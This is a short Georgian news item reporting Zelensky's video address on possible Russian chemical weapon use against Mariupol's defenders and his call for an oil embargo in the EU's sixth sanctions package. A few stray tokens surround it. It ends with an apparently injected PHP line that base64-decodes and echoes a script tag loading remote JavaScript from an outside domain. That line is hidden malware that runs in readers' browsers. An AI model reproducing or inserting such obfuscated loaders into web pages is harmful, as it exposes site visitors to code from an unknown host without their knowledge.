celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტმა, ვოლოდიმირ ზელენსკიმ მსოფლიო ლიდერებს შეახსენა, რომ ისინი დაჰპირდნენ მკაცრ და სწრაფ რეაგირებას რუსეთის მიერ უკრაინაში ქიმიური იარაღის გამოყენების შემთხვევაში. ამის შესახებ ზელენსკიმ ვიდეომიმართვაში ისაუბრა.
 
„დღეს ოკუპანტების მხრიდან გაჟღერდა ახალი განცხადება, რომელიც ადასტურებს მათ მიერ უკრაინისა და ჩვენი დამცველების წინააღმდეგ ტერორის ახალი ეტაპის დაწყებას. ოკუპანტების ერთ-ერთმა რუპორმა განაცხადა, რომ მათ შეუძლიათ მარიუპოლის დამცველების წინააღმდეგ ქიმიური იარაღის გამოყენება. ამას ძალიან სერიოზულად განვიხილავთ. მინდა, შევახსენო მსოფლიო ლიდერებს, რომ რუსი სამხედროების მიერ ქიმიური იარაღის შესაძლო გამოყენება უკვე განიხილებოდა და უკვე მაშინ ეს ნიშნავდა, რომ საჭიროა რუსეთის აგრესიაზე უფრო მკაცრი და სწრაფი რეაგირება. დღესვე ევროკავშირმა რუსეთის წინააღმდეგ სანქციების მეექვსე პაკეტის განხილვა დაიწყო. დროა, ეს პაკეტი გახდეს ისეთი, რომ რუსეთის მხრიდან მასობრივი განადგურების იარაღის შესახებ სიტყვაც კი აღარ ისმოდეს. რუსეთის წინააღმდეგ სანავთობო ემბარგო აუცილებელია. ნებისმიერი ახალი სასანქციო პაკეტი რუსეთის წინააღმდეგ, რომელიც არ მოიცავს ნავთობს, მოსკოვში აღქმული იქნება ღიმილით“, – განაცხადა ზელენსკიმ ვიდეომიმართვაში.
686
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");